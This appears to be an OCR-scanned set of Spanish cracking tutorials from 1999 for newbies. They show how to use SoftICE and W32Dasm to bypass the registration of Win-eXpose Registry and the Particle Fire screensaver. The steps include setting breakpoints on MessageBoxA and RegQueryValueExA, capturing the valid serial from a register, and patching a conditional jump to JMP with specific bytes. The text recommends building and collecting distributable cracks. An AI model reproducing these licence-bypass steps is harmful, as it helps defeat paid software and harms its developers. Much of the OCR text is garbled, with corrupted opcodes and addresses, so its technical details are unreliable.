D ESI --- OWL ahora ha capturado el segundo campo vamos a por el ultimo que es el que nos 
interesa, a partir de los datos que a recogido generara un n/s y lo comparara con el que 
hemos puesto, tenemos que encontrar el punto donde lo compara, pulsamos F5 y 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,A1l 


La tecera llamada que hace el programa, desde que pusimos el BP a la función 
Getdlgitemtexta. En este momento nos encontramos dentro de User32.d11l 


Pulsamos F12 para terminar esta llamada y nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015f:00415531 5F POP EDI 


015D:00415532 5E POP ESI ----- Captura el numero que pusimos 


T 


si repetimos el paso anterior y miramos que hay en ESI, vemos el n/s que hemos metido 


DESIL =-==== 123456789 


Ahora que ya tiene el n/s solo tenemos que seguir ejecutando el programa y ver que hace con 
el n/s, vamos pulsando F10 ( Tambien podriamos ir traceando con F8, Pero nos volveriamos un 
poco locos, ya que entrariamos en todas la llamadas (call) paso a paso. Pero si quereis 
probar..) 


0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


00415531 5F POP EDI 


00415532 5E POP ESI ----- Captura el numero que pusimos 


00415533 B801000000 MOV EAX, 00000001 


00415538 5B POP EBX 


00415539 C3 RET ------ Retorno de una llamada esto nos va ha trasladar al final de una 
llamada que estaba ejecutándose, seguro que nos lleva a la parte donde se genera y compara 
el n/s. Para los que no tengáis experiencia en crackeo os doy un consejo, desensamblar el 
programa este con el W32dasm y analizar esta parte del código, todo el proceso que estamos 
siguiendo, lo Vais a ver mucho mas claro con un listado muerto. ( pero claro primero 
terminemos esto ) 


A lo que estabamos el Ret nos lleva a: 


0040D342 E8B9810000 CALL 00415500 --—- VEIS EL RET ERA EL FINAL DE ESTA LLAMADA 


0040D347 8D4C2440 LEA ECX, [ESP+40] 


0040D34B 51 PUSH ECX 


SEGUIMOS CON F10 


0040D351 56 PUSH ESI 


0040D352 8BD8 MOV EBX,EAX ----- EAX LLEVA NUESTRO N/S MIRARLO 


0040D361 7518 JNZ 0040D37B ----- SALTA A 


? EAX 123456789 


CONTINUAMOS CON F10 


0040D37B 3B3CCE5O0D CMP EAX,005FCE3C compara 


0040D380 750CC JNZ 0040D38E ------- SALTA A si no es O (osea si) 
0040D38E 57 PUSH EDI ----- GUARDA NUESTRA ORGANITATION 
0040D38r 56 PUSH ESI ----- GUARDA NUESTRO USER NAME 


0040D390 E89BB7B0000 CALL 00414F30 -— LLAMA A LA RUTINA QUE GENERA EL N/S 


0040D395 83C408 ADD, 08 


0040D398 3BD8 CMP EBX,EAX ----- COMPARA LOS N/S EL NUESTRO CON EL VALIDO 


SOLO NOS QUEDA SABER CUAL ES EL QUE SE CORRESPONDE CON LOS DATOS QUE HEMOS PUESTO. 


? EBX = 123456789 el nuestro 
? EAX = 3703297526 el que vale 
Acordaros de que si pusisteis el user name con mayusculas a la ora de meter el n/s , a de 


estar exactamente igual. 


Como siempre espero que lo ayais cojido, yo intento explicar lo mejor que puedo, pero no soy 
ningun experto por lo tanto hay algunas comprovaciones que realiza el codigo que no puedo 
explicarlas por que no las se, supongo que conprobara que el n/s tenga un minimo y un maximo 
de longitud, que esten todos los campos completos, que sean numeros y no letras etc. 


Cualquier Duda, Sugerencia, Critica etc. A 
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Programa: Win-eXpose Registry V1.0 


PROTECCION: Name / Serial 


Descripcion: | Spya del Registro de Windows 
Dificultad: PR 
DOWNLOAD : http: //www.shetef.com/wxr95-10.zip 


Herramientas: Softlce v3x +, W32Dasm , Editor Hexadecimal 
CRACKER: karpoff FECHA: 21/08/99 


| INTRODUCCION 


Hi Tutoríal de Crackeo Para Newbies desde Cero 21/08/99 


Por Karpoff it PROYECTO 6 ¿Hit 


- Continuando Con el SoftlIce. 


Win-eXpose Registry V1.0 


Hola nuevamente a todos/as, que tal el proyecto 5 ?????, seguro que la mayoría 
conseguisteis el n/s correcto. Debido a que he recibido algunos Emails pidiéndome que 
continuase con proyectos basados en W32Dasm, he escogido este programa. 


Es una utilidad muy buena para rastrear los procesos de cualquier aplicación que se 
ejecute en nuestra maquina, esta utilidad muestra los cambios que puede hacer un 
proceso tal, en el registro. 


La podedeis coger de: 


http: //www.shetef.com/wxr95-10.zip 


AL ATAKE 


Lo estudiaremos con el Softlce y con W32Dasm, así podéis escoger la herramienta que mas os 
guste. De todas formas sigo pensando que si habéis seguido los manuales estáis mas que 
preparados para utilizar el Softlce, yo os recomiendo este, las protecciones Cada vez son 
mas enrevesadas, y con un listado muerto es imposible de seguir. 


El programa de hoy es bastante antiguo tiene una protección ridícula, para registrar el 
programa tenemos que rellenar un formulario que casi parece nuestro D.N.I. nos pide nombre, 
ler apellido, 2do apellido, nombre de la compañía ( Leticia J ) un numero de serie y un 
passwod. La clave valida se genera según el numero de serie que metamos, una vez generado el 
numero valido, no lo guarda en el registro ni lo encripta en dios sabe donde, sino que lo 
guarda su archivo .ini. 


Herramientas: las de siempre. Softlce o W32Dasm y un HEX editor. 


Ataques, Localizar la rutina que se encarga de verificar si el n/s que hemos metido es 

correcto o no, y manipularla para nuestro beneficio, o bien eliminarla si es posible, o 
podemos localizar el punto donde se genera el n/s valido y capturarlo, En esta ocasión 

haremos las dos cosas. 


El programa nos da una evaluación de 30 días, pasado este tiempo, no podemos seguir 
utilizándolo, ya que detiene el proceso que este realizando y nos muestra la pantalla de 
registro cada x tiempo 


PARTE 1 ( CON EL SOFTICE) 


Empezamos con el Softlce. Arrancamos el ordenata y Cargamos el SoftlIce, abrimos Wxr95.exe 
con el soft. Pulsamos el botón de los engranajes para empezar a tracear el programa. 
Saltamos al softlce y pulsamos F5 para que continúe su ejecución, aparecemos otra vez en 
Windows y con el programa abierto, metamos los datos del registro. 


Your asked to enter: 


Your First,LastName:a 


Company Name, :a 


Address Line 1: a 


Address Line 2: OWL(Bhuo) 


Serial Number: 123456789 


Password: 123456789 


Podéis rellenar con los datos que queráis, según que datos metáis generara un numero u otro. 
Ahora debemos poner un BP o punto de ruptura, para Capturar la rutina que comprueba nuestro 
numero y genera el numero valido, yo he probado con Messageboxa , pero podéis intentarlo con 
otros BPs, ( es mas, os obligo a que practiquéis con otros BreakPoints, para ver las 
diferencias entre que procesos Capturan unos u otros, aprenderéis mucho probando.) Pulsamos 
[Ctrl1+D] para saltar al Softice y ponemos. 


BPX messageboxa 


Volvemos a pulsar [Ctrl1+D] Para salir del Softice y pulsamos aceptar en los datos del 
registro, en este momento el breackPoint que pusimos hace efecto y saltamos al Soft. Justo 
en: 


User32! Messageboxa 


015F:BFF5412E 55 PUSH EBP 


Aparecemos directamente dentro de user32.dl11l en una llamada externa a messageboxa, a 
nosotros no nos interesa para nada navegar dentro de esta dll lo que nos interesa averiguar 
es quien llamo a messageboxa. 


Para ver quien hizo la llamada a messageboxa pulsamos F11 o F12 Y ooh L salimos a Windows 
con el mensaje de que hemos fallado en el registro, que nos sugiere esto, (antes de seguir 
leyendo pensar porque en vez de llavarnos a el principio de la llamada nos saca a windows 
con el mensaje de error. ) pues que la llamada que se hizo a messageboxa debe se ser muy 
sencilla, y pequeña, ( esto siempre son mis deducciones que podrían no ser del todo así, 
pero como ya he comentado mis conocimientos son bastante pobres J ) 


Como siempre mi ataque es pensar que tiene que haber una parte de la rutina donde comprueba 
si es valido el numero metido o si es falso, esta comprobación estaría seguida de un salto 
que dependiendo del valor que reciba saltara a el mensaje de error o continuara su ejecución 
normal aceptando el numero de registro, o viceversa . (aclaro que este tipo de comprobación 
que comento es la mas sencilla que conozco, podría no tener nada que ver con este estilo, 
pero dado que es un programa antiguo y que utiliza un archivo .ini para guardar el registro 
creo que es la que utiliza.) 


Continuamos nos habíamos quedado en el mensaje de error, como todavía tenemos el BreakPoint 
messageboxa activado pulsamos [OK] en el mensaje de error y nos lleva a: 


:004025A3 CALL [USER32 !MessageBoxA] 
:004025A9 MOV BYTE PTR [EBP-04],00 --á Aquí aparecemos. 
:004025AD CALL 00402750 

:004025B2 MOVE DWORD PTR [EBP-04],FFFFFFFF 
:004025B9 CALL 00402762 

:004025BE MOV EAX, [EBP-0C] 

:004025C1 POP EDI 

:004025C2 MOV FS: [00000000],EAX 
:004025C8 POP ESI 

:004025C9 POP EBX 

:004025CA MOV ESP, EBP 

:004025CC POP EBP 

:004025CD RET 


Creo que estamos al final de la rutina de comprobacion, entonces remontemos la rutina para 
localizar una comprobación tipo TEST XXX,XXX Oo CMP XXX, XXXXXXX seguida de un salto que tenga 
las Características si el numero es valido salta si no es valido continua, [ O al rreves), 
Miremos que encontramos por hay arriba, subimos mas mas un poquito mas, y encontramos el 
primer je que según el valor que reciba de Test XXX,XXX salta o sigue su ejecución. 


:004024F7 TEST EAX,EAX á si el numero es correcto le dice a el salto que salte a la 
dirección 004025ce, si es falso continua ejecutándose en la siguiente línea, y empieza a 
generar los mensajes de error. 


:004024F9 JZ 004025CE a Según el valor que le asigne TEST salta o no. 


:004024FF PUSH 0040A1A4 


:00402504 MOV ECX, 0040A90 


:00402509 PUSH 0040A158 


:0040250E PUSH 0040A140 


:00402513 CALL 00406E40 


Y vosotros os preguntáis, y como save este tío que para que acepte el numero de registro lo 
valido es que salte y no al reves. Contestación pues podéis probar a cambiar el salto por un 
salto incondicional (jmp) que salta lleve el valor que lleve. O podéis desensamblar el 
programa y observar esta parte del código, veréis que si no salta y sigue su ejecución 
normal, se va ha encontrar con todos los avisos de error, pero si salta evita todos los 
aviso. ( tenéis que verificar lo que os he dicho es obligatorio J ) 


Continuamos, estabamos dentro del soft y habíamos localizado el posible salto. 


Bueno hemos localizado el salto pero esta parte del código ya se ha ejecutado así que 
tenemos que entrar en el soft antes de que se ejecute este salto para así poder manipularlo, 
como lo hacemos muy fácil tenemos que ponerle un BreakPoint para entrar en el soft justo 
antes de que se ejecute, y tenemos que borrar el BreakPoint messageboxa para que no se 
active en plena ejecución, porque ya hemos localizado lo que queríamos, pues no nos sirve ya 
para nada. Para desactivar el BreackPoint 


BC 00 á Borra el primer Breakpoint que hallamos puesto en este caso messageboxa, para ver 
que numero de BP tiene asignado Cada uno en caso de que hubieseis utilizado otros. 


BL á nos lista los breakPoint tanto activos como desactivados, ej, 


BL [INTRO] 


00 messageboxa 


01 messagebox 


02 getwindowtexta 


Una vez borrados los BreakPoints, le ponemos otro a :004024F9 JZ 004025CE , para poner 
un BP a una dirección de memoria podemos hacer doble clip encima de la dirección que nos 
interese o como siempre con el comando BPX 


BPX 004024F9 


Si ya hemos hecho todo esto pulsamos F5 o [Ctrl+D] para salir del Soft, estamos nuevamente 
en el formulario de registro, ahora solo tenemos que pulsar OK y aparecemos justo en el 
salto :004024F9 JZ 004025CE ,Bueno tenemos que convertirlo en un salto incondicional 
(jmp) que salte por narices, lo primero desactivamos o borramos el BP que le hemos puesto, 
ya no nos sirve para nada, ahh muy importante, y si este no fuese el salto que buscábamos??7? 
,si este es el salto correcto todavía no se tiene que haber generado el mensaje de error 
como saberlo, recordar el tutorial anterior.... solo tenemos que pulsar la tecla F4 para ver 
como van las cosas fuera del soft si pulsamos F4 y esta el aviso de numero incorrecto mal 
asunto, si no esta vamos bien, pulsamos F4 y vemos que no se ha generado bien J , volvemos 
al soft pulsando otra vez F4. Tenemos que convertir 


004024f9 0F84CF000000 JZ 004025CE 


CAMBIARLO POR 004024F9 ¿727277272 2727777 JMP 004025CE a salto incondicional 


Las interrogaciones significan que tendremos que averiguar que Bytes son los que harán que 
jz se convierta en jJmp para que el programa funcione correctamente, debemos tener en cuenta 


que si hay que cambiar Bytes nunca podemos meter mas o menos Bytes de los originales. Hasta 
ahora hemos cambiado: 


JE POR JNE = 74 POR 75 


JNE POR JMP = 75 POR EB 


JE POR JNE = 0F84CF000000 POR 0F85CF000000 


PERO COMO CAMBIAMOS UN 0F84CF000000 JE POR UN JMP 


La manera que yo utilizo es, cuando lo cambiemos en el soft fijaros en como cambian esos 
Bytes y apuntarlo, por que si luego queremos generar el Crack necesitaremos un HEX edit y 
cambiar los Bytes por los que hemos apuntado. (con el W32dasm también podemos averiguar que 
Bytes son la sustitución correcta, luego lo explico.) 


Estamos dentro del Soft justo en el salto que nos interesa, hemos desactivado el BP del 
salto haciendo doble clip sobre el ( se quitara el azul cyan ) o con el comando 


BC 004024F9 y ahora a ensamblar la nueva instrucción, con el comando A del SOFT 


004024f9 0F84CF000000 JZ 004025CE 


004024FF 684A1400 PUSH 0040A1A4 


A 004024F9 [INTRO] 


Nos mostrara.. 


T 


015F:004024F9 á AQUÍ TENEMOS QUE ESCRIBIR EL CAMBIO QUE TENEMOS QUE HACER OSEA. 


015F:004024F9 JMP 004025CE [INTRO] EN ROJO LO QUE HEMOS ESCRITO PAR ENSAMBLARLO. 


015F:004024FF [INTRO]NOS MUESTRA LA SIGUIENTE DIRECCION DE MEMORIA POR SI QUEREMOS SEGUIR 
ENSAMBLANDO NUEVAS INSTRUCCIONES, COMO NO QUEREMOS PULSAMOS [INTRO] Y LA NUEVA INSTRUCCIÓN 
QUEDA ENSAMBLADA. 


Ahora fijaros en el Soft como ha cambiado la línea del salto, tiene que mostrar esto. 


004024f9 E9DO00000000 JMP 004025CE a Ahora si salta a 004025CE 


apuntar en un papel lo que esta en rojo para luego hacer el crack. 


Bueno ahora pulsamos F5 para que se termine de ejecutar el programa y OLEEE J J , no hay 
aviso de error nos ha aceptado el numero pero que numero es?. 


Vamos a C:IWindows y editamos el archivo Wxr95.ini y 


Key=EXPREF062F11 


Este código solo es valido para los datos que hemos utilizado 


Ya tenemos registrado el programa. si miráis en help about veréis los datos que halláis 
metido J 


PARTE 2 W32Dasm 


Quiero deciros que en esta segunda parte no me voy a extender en explicaciones, ya que es el 
mismo programa solo que con distinta herramienta las explicaciones de funcionamiento, 
protecciones y ataques son las mismas que con el Soft. 


Lo primero hacer una copia del ejecutable Wxr95.exe bien con otro nombre o copiando todo el 
programa a otra carpeta. Abrir el original con el W32Dasm y la copia con un Editor HEX. 


Empezamos pulsamos el botón del W32dasm que nos muestra todas las cadenas de texto. 
Localizamos la que nos escupe cuando fallamos en el registro 


Wrong password please reenter 


Hacemos doble clip sobre la frase y nos lleva a 


Possible StringData Ref from Data Obj á " Wrong password please re-enter " 


a " Informarion." 


:0040259%c 6860%14000 PUSH 0040A160 


bueno pues como siempre tenemos que encontrar un salto con la siguientes Características, 
que según el valor que le asignen pueda saltarse este aviso, o que su ejecución normal le 
permita llegar asta este aviso, dependiendo de si acepta el registro o no, pues ala manos a 
la obra. 


Os habéis fijado, que según íbamos hacia arriba nos encontrábamos con un montón de avisos 
todos ellos relacionados con formulario de registro, y al final de todos ellos el salto con 
las Características que buscamos. 


:004024F7 85c0 TEST EAX,EAX á si el numero es correcto le dice a el salto que salte a 
la dirección 004025ce, si es falso continua ejecutándose en la siguiente línea, y empieza a 
generar los mensajes de error. 


:004024F9 0F84CF000000 Je 004025CE a Según el valor que le asigne TEST salta o no. 


Como veis si salta evitaría el aviso de error, y si no salta continuaría normalmente hasta 
el aviso maligno. Que tenemos que hacer para que salte convertirlo en un salto incondicional 
que salte por narices. 


Como he comentado en la parte 1 no estamos acostumbrados a realizar cambios se saltos, con 
tantos Bytes, así que os explicare como saber que bytes son los validos para poder patchear 
el je por jmp 


En el menú de archivos pulsar en debug y seguidamente en load proccess, vamos a aplicar el 
cambio al estilo del Soft, con el programa en marcha. Para el que no lo sepa el W32dasm 
cuenta con su propio debug es pobre comparado con el soft aunque muy cojonudo comparado con 
otros que hay por hay , dedicare un turorial a explicar como utilizar este debug. 


Bueno si habéis hecho lo que os dije, ahora tendréis una ventanita con una línea de 
comandos, si poner nada pulsar load, y el debug empieza a ejecutar el Wxr95.exe 


Ahora pulsar en la opción GOTO ADDRESS ( IR A UNA DIRECCION DE MEMORIA ), aparecerá una 
ventana donde debéis de meter la dirección de memoria donde se encuentra el salto que 
queremos patchear escribimos 004024f9 , y pulsamos OK 


qe 


E inmediatamente aparece en la ventana de procesos nuestro salto. 


Ahora para modificarlo pulsaremos la casilla Patch Code y se habré otra ventana con nuestro 
salto y una línea de comandos para aplicar los cambios que queremos realizar, osease que 
escribimos: 


JMP 004025CE Y PULSAMOS [INTRO] 


T 


Ahora fijaros en code Patch listing hay tenemos el patcher que acabamos de generar, tiene 
que mostraros esto 


004024f9 E9DO00000000 JMP 004025CE el patcher todavía no esta aplicado, pero ya sabemos 
cuales son los Bytes que hay que utilizar para Cambiar el je del código original por el jmp 
del código manipulado, estos bytes son los que están en rojo, si quereis generar luego el 
cack recomiendo que lo apunteis, para aplicarlos en el editor HEX. 


Bueno apliquemos el patcher a el programa, todavía tenemos la ventana donde nos muestra el 
patcher que hemos generado, para aplicarlo solo tenemos que pulsar la opción Apply Patch, 
una vez que hemos pulsado esa opción nos pide confirmación, aceptamos claro, y ya esta 
cerramos esa ventana pulsando Close, ahora ya esta el patch aplicado, se supone que si 
pulsamos la opción run o la tecla F9 el programa aceptara cualquier registro que metamos. Y 
como era de esperar así ha sido. 


Ahora si miráis en el archivo Wxr95.ini que se encuentra en C:lwindows veréis en 


KEY:vuestra Clave de registro 


No es necesario parchear con el Editor Hex los cambios, ya que nos ha generado una clave 
valida en el archivo Wxr95.ini, bueno en realidad la clave si la metes desde el formulario 
de registro no es valida, lo que es valido es todo el archivo Wxr95.ini, que en este caso 
seria un Crack valido. 


De todos modos yo os recomiendo que generéis el crack parcheando la copia del ejecutable con 
el editor Hex, y hacer el ejecutable con cualquier Generador de cracks, lo guardais hasta 
que tengáis una gran colección, luego le dejáis flipado/a a la novia/o J 


No explicare como aplicar los cambios con el Hex, por que ya tenéis nivel para eso y mucho 
mas. hasta el próximo tutorial, 


Un saludo a Todos/as [y como no a el Bhuo]. 


( Karpoff.) 


Como siempre espero que lo halláis cogido, yo intento explicar lo mejor que puedo, pero no 
soy ningún experto. 


Si teneis algun programa que os esta dando gerra porque no podeis con el, Podemos analizarlo 
aqui. Solo teneis que mandarme un email. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf_karpofff(hotmail.com URL: http://welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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nes [Salvapamaas 
A Ma e as 

Url http://www.longbowdigitalarts.com/particlefire.html 
Peón aa 
| Dificultad [1) Principiante y 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas — [Softlce v4.00, Regmon, Hiew 6.04 (mASM32 opciona) 
| Objetivo  [Parchear la comprobación del S/N o hallar uno válido. 
rare Am 
Fea 1 e Agosto de 1 


Introducción 


El salvapantallas es vistoso, aunque es el primero que veo que pretenden 
hacerte pagar por él (hay gratis a patadas en internet), aunque bueno, cada 
cual que haga lo que quiera; si realmente te gusta, creo que solo son unos 
10$... Para registrarse, hay que introducir un número en la pantalla de 
configuración del salvapantallas; si no, al cabo de 7 días, cuando el 
salvapantallas lleva un par de minutos, comienza con los clásicos mensajitos 
tipo "regístrate porfa". Nunca he visto un tutorial sobre un screensaver, así 
que ya que lo conseguí con este, he pensado en contarlo y de paso ilustrar la 
aplicación del método 'bpx RegQueryValueExA' para programas que 
interactuan poco o nada con el usuario a la hora de registrarse pero que leen 
datos tipo s/n desde el registro de Windows (este es su punto de contacto 
con el mundo 'real'). Dado que me considero un principiante, he tratado de 
escribir esto a un nivel bastante bajo, aunque he desarrollado dos métodos 
de cracking, uno para principiantes (parchear) y uno para amateurs 
(keygen); es por estos motivos que este documento es un poco largo. Sin 
embargo, la gente más avanzada podrá leerlo de corrido (o leer directamente 
el 'briefing' (resumen) del final de todo). 


Al Atake 


1. Familiarizándonos 
Bien, nuestro primer punto de partida es familiarizarnos con el programa y su mecanismo de 
protección. Éste consiste en la introducción de un número en la ventana de configuración del 
protector de pantalla (podemos acceder desde Panel de control / Propiedades de pantalla / Configurar 
protector pantalla, o bien desde el menú contextual que aparece al pulsar el botón derecho sobre el 
fichero de ParticleFire). Si el número no es el correcto, y ya han pasado 7 días desde que lo 
instalamos, veremos mensajes molestos al cabo de un par de minutos de iniciarse el screen saver 
(adelantad 10 días el calendario para verlos). 


Así que tenemos que solucionar eso... pero para nuestra desdicha, constatamos que, tras introducir un 
número (por ejemplo 12345) y aceptar, no aparece ningún mensaje que valide o invalide el código 
introducido. Sin embargo, si volvemos a entrar, nuestro número sigue ahí. Si hacemos algún 
experimento, probando números y entrando y saliendo de la configuración, llegaremos a la 
conclusión de que, posiblemente, el serial num debe ser de 10 cifras (o menos) y formado 
exclusivamente por números (de otro modo, trunca o pone a cero la expresión introducida cuando 
volvemos a entrar a "configurar”). 


Ahora que creemos tener una leve orientación sobre lo que buscamos, hacemos pruebas a base de 
poner break-points en las típicas funciones que capturan el texto de un cuadro de diálogo, 
comparación de cadenas, etc. Pero... no parecen llevarnos a ninguna parte. 


Quizás los autores del Particle Fire quieran echarnos una mano ;) echamos un vistazo al read-me que 
lo acompaña. Allí encontramos un par de informaciones interesantes: 


(1) 'asegúrate de introducir correctamente el serial-num' 
(2) 'por favor no digas a nadie tu número de registro' 


Traducción: 


(1) no hay mensaje tipo 'gracias por registrarte' o 'serial num incorrecto' 
(2) el número es independiente de tu nombre, disco duro, etc.. 


Si bien el punto (2) nos facilita un poco las cosas, el (1) las complica porque significa que, 
posiblemente, la comprobación del serial num no se realiza cuando lo entramos en 'configurar' si no 
al correr el salvapantallas. Es decir, la típica relación causa-efecto entre el serial/keyfile/etc y nag 
screen/reminder/lo que sea, está en cierto modo disociada, separada, retardada. 


Sin embargo, tiene que haber un nexo de unión entre ambos. El número que entramos en configurar, 
el Pfire lo tiene que leer de algún sitio. Yo ya me imagino donde está, pero vamos a correr el Regmon 
para asegurarnos... ejecutamos el salvapantallas y nos encontramos con que, antes de comenzar, lee 
una serie de parámetros del registro. Entre ellos, el serial num... si hacemos doble click sobre esa 
línea desde RegMon, se abrirá el RegEdit en esa rama, y veremos que el Pfire, como buen 
screensaver, tiene guardaditos ahí sus parámetros, incluido el serial num que le hayamos puesto... 
estos parámetros los debe de leer el Particle Fire cuando se ejecuta como salvapantallas... que bien... 
porque hace poco estuve leyendo algo sobre la función API RegQueryValue, que precisamente es 
la que lee datos del registro. Pero en realidad hay varias parecidas; RegQueryValue, 


RegQueryValueEx y RegQueryValueA. Para Win32 ansi la 'ExA' es la que nos vale, pero por 
si tenemos duda en estos casos, abrimos el fichero en el w32 Dasm, y le damos al botón de funciones 
importadas; allí nos aparecerá, para este caso, la función RegQueryValueExA, junto a otras funciones 
tipo OpenKey que van "abriendo" el camino para la QueryValue. Creo que el serial num se debe 
sentir un poco solo, así que vamos a tratar de acompañarle durante su viaje, a ver que hacen con él. 
Antes de empezar, escogemos un serial que nos haga de referencia, para identificarlo luego cuando lo 
lea y lo compare o haga lo que sea con él. Basándonos en nuestras pruebas, ponemos 1000000000 
(mil millones) en la pantalla de configurar (podemos poner otro, pero recordemos cual), aceptamos y 
salimos. Tomamos tambien nota del equivalente en hexadecimal de nuestro número, para que no nos 
cojan desprevenidos; 3B9ACAOO. Ahora pondremos el breakpoint y trataremos de subirnos al tren a 
la vez que lo hace nuestro serial. 


2. Manos a la obra: un breakpoint en la lectura del registro 

Para ello, ctrl+d, bpx RegQueryValueExaA, ctrl+d. Traducción: entramos al Softlce, ponemos un 
breakpoint en la función de Windows que lee del registro para que el Softlce nos avise y salimos otra 
vez a Windows con ctrl+d. Ahora tenemos dos opciones, ejecutar nosotros mismos el salvapantallas o 
esperar que salga (previamente le habremos puesto el mínimo tiempo, un minuto). Esto puede parecer 

una tontería, pero si lo ejecutamos directamente, aparecerán unas 50 llamadas-basura a la función 

RegQueryValueExaA (por lo menos a mi me pasa). Si esperamos que salga el Pfire por si solo, ya 
casi estaremos en el punto (nota: puede que durante la espera nos salte el breakpoint hasta 10 veces o 

más -o quizás ninguna-, por accesos rutinarios del sistema al registro; lo ignoramos haciendo ctrl+d 
para salir otra vez, y seguimos esperando hasta que pase el minuto y nos salga el pfire; para disminuir 

el riesgo de que pase esto, mejor no tener programas abiertos o solo lo imprescindible, y 
evidentemente, no tocar ninguna tecla ni mover el ratón). 


Al cabo de un minuto, nos sale un breakpoint. Este ya es del propio Pfire, ya que en el borde inferior 
derecho del Softlce pondrá 'Particle Fire". No obstante, las primeras llamadas aún no nos 
interesan. Si hacemos F12, veremos que se ha llamado a la función a través de un CALL ESI o 
CALL EBX. Mientras esto suceda (seguramente saldrán 4 llamadas de este tipo en total, dos de cada), 
vamos haciendo ctrl+d, hasta que llegue un momento en que al salir el breakpoint y apretar F12 
veamos que se ha llamado a la función por su nombre, algo así como: 


PUSH ECX 


PUSH ESI 

PUSH ESI 

PUSH 004147F8 

PUSH DWORD PTR [EBP-04] 

CALL [ADVAPI32!RegQueryValueExA] 
TEST EAX, EAX 


(Insisto, ten en cuenta que no 'aterrizas' directamente aquí, tienes que haber pulsado F12) 


Vamos a comentar la jugada: en azul, los PUSH van pasando uno a uno los parámetros de la función, 
a la cual se llama con el CALL, en rojo. Concretamente, el penultimo valor contiene la dirección de 
memoria donde se halla el nombre del valor que se quiere leer (esto lo sabemos si miramos la 


documentación de referencia de WinAPI32). En este caso, vemos que es 4147F'8, así que hacemos 
und 4147F8 para que el Softice nos muestre que hay en esa dirección. Veremos en la pantalla de 
datos (si no la tienes a la vista, se pone/quita con wd) que es 'screensaveusepassword'. Bueno, esto no 
nos interesa, solo debe estar comprobando si tenemos puesto password con el salvapantallas o no. Así 
que ctrl+d, y de nuevo ha saltado el breakpoint por otro acceso al registro. Pulsamos F12 para ver 
quien le ha llamado y como, y tenemos: 


015F:00404F7A PUSH EAX 

015F:00404F7B PUSH ECX 

015F:00404F"7C MOV EAX, [ESI+00000400] 
015F:00404F82 PUSH EDX 

015F:00404F83 PUSH 00 

015F:00404F85 PUSH EBX 

015F:00404F86 PUSH EAX 

015F:00404F87 CALL [ADVAPI32 ! RegQueryvalueExA] 
015F:00404F8D TEST EAX, EAX 
015F:00404F8F JNZ 00404FA7 
015F:00404F91 MOV EAX, (ESP+14] 
015F:00404F95 MOV ECX,ESI 
015F:00404F97 MOV [EDI], ,EAX 


Reconocemos la idea otra vez, ¿no? En azul, son los parámetros que pasamos, en rojo la llamada a la 
función. Como veríamos si siguieramos saliendo y entrando, este fragmento del código es el que a 
partir de ahora se repetirá en cada lectura de valores del registro (claro que cada vez se lo montará 
para usar parámetros distintos, si no siempre haría lo mismo, pero será el mismo trozo de programa), 
de modo que vamos a borrar nuestro breakpoint con bc 00, y a poner otro justo en el punto donde 
llama a la función, para que antes de llamarla podamos ver qué pretende hacer; así que ponemos bpx 
404£87 (fíjate cual es esta dirección en tu caso; podría ser otra). Este cambio de breakpoint no es 
100% imprescindible, pero así nos ahorraremos darle al F12 cada vez y todo será más claro, puesto 
que pararemos ANTES de entrar en la función RegQueryValueExa. Por cierto, antes de salir 
hacemos d ebx y vemos : RandomTime, uno de los parámetros. Bueno, aún no es el que nos 
interesa, pero parece que estamos en el buen camino... 


Así que ctrl+d para salir, y boom, ya estamos otra vez en Softlce, justo antes de llamar otra vez a 
RegQueryValueExA (no hemos de pulsar F12). Vamos a ver que quiere leer ahora... hacemos d 
ebx, y nos sale GravityTime... otro parámetro, y justo despues suyo pone RandomTime...mmh, 
es el anterior... usamos alt+flecha arriba/abajo para desplazarnos por ese listado, y vemos como 
encima de esos parámetros, están los demás haciendo 'cola', concretamente deberíamos estar viendo 
RandomColor, ColorScheme, Particles y ... nuestro querido SerialNum! Pues bueno, 
como es evidente se trata de ir haciendo ctrl+d y comprobando ebx (todo el rato el listado será como 
el que he puesto más arriba) hasta que estemos en el punto en que va a leer el serial num. Son 4 
veces, pero es recomendable ir uno a uno y comprobando ebx hasta que veamos que apunta 
directamente a SerialNum. Ahora querremos ver que hace con él, así que vamos a ir trazando la 
función. Estamos situados en el CALL [ADVAPI32 ! RegQueryvalueExA]; pulsamos F10 
puesto que no nos interesa seguir a la función API en sí (tanto FS como F10 ejecutan igual el 
programa, pero con F10 nos ahorramos ver la ejecución de CALLs como este que no nos interesan). 
Ahora representa que hemos vuelto de la función que lee el registro, y el valor de nuestro serial num 


de prueba debe andar en alguna parte. Observemos las lineas siguientes al CALL: 


015F: 
0O15F: 
0O15F: 
015F: 
015F: 
0O15F: 
015F: 


00404F87 
00404F8D 
00404F8F 
00404F91 
00404F95 
00404F97 
00404F99 


CALL [ADVAPI32 ! 
TEST EAX, EAX 
JNZ 00404FA7 
MOV EAX, [ESP+14] 
MOV ECX,ESI 

MOV [EDI],EAX 
CALL 00404EC0O 


RegQueryvalueExA] 


El test eax,eax y el jnz parecen una comprobación de rutina a la vuelta de la función. Los 
movimientos que hay despues parece que sean mas deliberados. Echamos un vistazo a esos valores, 
teniendo en cuenta que nuestro serial 1000000000 en hexadecimal es 3B9ACA0O. Haciendo d 
esp+14, enseguida encontramos que en esa dirección está nuestro querido serial, que es copiado a 
EAX (nota: si veis el serial 'al revés' o sea OOCA9A3B, pulsad SHIFT+F3 para cambiar el formato de 
la ventana data hasta verlo como DWORD - gracias PicsOne!). Pero no le perdamos la pista, porque 
dos lineas más abajo vuelve a cambiar de vagón: ahora EAX se copia a la dirección apuntada por 
EDI. Bueno, pues miramos el valor de EDI con ? edi, y en mi caso es 412114. Ahí se sienta mi 
serial, así que vamos a poner un breakpoint para que cualquier acceso a esa posición de memoria sea 
detectada; ponemos bpm 412114 (ojo, no bpx si no bpm : no controla la ejecución si no la 
manipulación de lo que hay en ella). Tambien quitamos el bex 404f87 que teníamos, puesto que 
ya nos ha aportado lo que queríamos; bc 00, ctrl+d y salimos del Softice. 


3. La rutina de comprobación del serial 


